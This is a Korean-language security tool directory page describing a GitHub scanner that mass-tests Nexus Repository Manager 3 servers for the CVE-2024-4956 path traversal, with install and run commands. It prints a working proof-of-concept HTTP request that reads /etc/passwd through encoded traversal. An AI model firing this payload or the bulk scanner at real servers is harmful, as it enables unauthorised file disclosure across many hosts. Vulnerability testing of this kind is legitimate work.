Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-4956-Bulk-Scanner — [CVE-2024-4956] Nexus Repository Manager 3 인증되지 않은 경로 탐색 대량 스캐너 | Kitploit
도구/GitHubGitHub/ifconfig-me/cve-2024-4956-bulk-scanner
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubifconfig-me/cve-2024-4956-bulk-scanner

CVE-2024-4956-Bulk-Scanner

[CVE-2024-4956] Nexus Repository Manager 3 인증되지 않은 경로 탐색 대량 스캐너

저장소 보기
17641년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-4956 대량 스캐너

면책 조항

이 도구는 교육 목적 및 기업 환경에서의 테스트만을 위해 사용됩니다. https://twitter.com/nav1n0x/ 및 https://github.com/ifconfig-me는 이 코드의 오용에 대해 책임을 지지 않습니다. 사용에 따른 위험은 본인이 부담합니다. 허가 없이 대상체를 공격하지 마십시오. 이 도구는 공개적으로 공개된 페이로드를 사용합니다.

이 스캐너는 보안 애호가들이 Nexus Repository 대상체에서 경로 탐색 취약점(Path Traversal Vulnerability)을 대량으로 스캔할 수 있도록 도와줍니다.

스캐너는 로드된 대상체 수와 현재 스캔 상태를 표시합니다. URL은 결과에 따라 Timeout, Fail, Success의 세 가지 상태 메시지와 함께 나열됩니다. targets.txt에 도메인 목록이 포함되어 있고 lfi-payloads.txt에 페이로드 목록이 포함되어 있는지 확인하십시오. 스캐너는 각각의 새 요청마다 업데이트되며 현재 테스트 중인 URL을 표시하고 각각 성공 또는 실패를 나타냅니다. 또한 스크립트는 성공한 URL 목록을 successful_urls.txt로 디렉터리에 저장합니다. 마지막에는 성공한 시도 횟수 요약을 제공합니다.

설치

Python 3.6+ 및 pip가 설치되어 있는지 확인하십시오.

  1. 저장소를 복제합니다:

    • git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.git
  • cd CVE-2024-4956-Bulk-Scanner
  • 필요한 종속성을 설치합니다:

    pip install -r requirements.txt

  • 사용 방법

    1. targets.txt 파일에 도메인 목록을, lfi-payloads.txt 파일에 페이로드 목록을 준비합니다.

    2. 스캐너를 실행합니다:

      python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt

    PoC

    root@kitploit:~
    GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
    Host: target.com:8081
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    

    성공적인 공격

    image

    작동 중인 스캐너

    image

    면책 조항

    이 도구는 교육 목적 및 기업 환경에서의 테스트만을 위해 사용됩니다. https://twitter.com/nav1n0x/ 및 https://github.com/ifconfig-me는 코드에 대해 책임을 지지 않습니다. 사용에 따른 위험은 본인이 부담합니다. 허가 없이 대상체를 공격하지 마십시오.

    도구 다운로드